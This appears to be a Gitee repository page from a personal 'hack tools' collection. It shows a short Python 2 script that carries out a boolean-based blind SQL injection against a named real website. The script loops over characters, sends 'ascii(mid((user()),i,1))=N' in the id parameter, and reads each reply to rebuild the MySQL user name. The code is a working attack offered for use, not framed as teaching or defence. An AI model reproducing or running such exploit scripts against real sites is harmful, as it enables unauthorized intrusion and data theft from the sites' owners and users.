首页 开源 资讯 活动 开源许可证
软件工程云服务
软件代码质量检测云服务 持续集成与部署云服务 社区个性化内容推荐服务 贡献审阅人推荐服务 群体化学习服务 重睛鸟代码扫描工具
Watch 3 Star 3 Fork 0

墨玉麒麟/hack_tools_for_me

代码 Issues 0 Pull Requests 0 Wiki 1 统计
加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
项目仓库所选许可证以仓库主分支所使用许可证为准
克隆/下载
MySQL注射(基于bool).py 1.15 KB
一键复制 编辑 原始数据 按行查看 历史
phantomer 提交于 2015-09-16 11:13 . bool mysqli
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139
#encoding=utf-8







import httplib







import time







import string







import sys







import random







import urllib















headers = {







    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',







}















payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')



















print 'start to retrive MySQL user:'







user = ''







for i in range(1,15,1):







    for payload in payloads:











        conn = httplib.HTTPConnection('lbj.cikuu.com', timeout=60)







        s = "ascii(mid((user()),%s,1))=%s" % (i, ord(payload))



        



        conn.request(method='GET',







                     url="/index.php?a=arcon&id=-1 OR " + s + "&m=Index",



                     



                     headers = headers)







        html_doc = conn.getresponse().read()



        conn.close()



        



       



        



        if html_doc.find('2014') > 0:







            user += payload







            sys.stdout.write('\r[In progress] %s' % user)







            sys.stdout.flush()







            break







        else:







            print '.',















print '\n[Done]MySQL user is', user
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化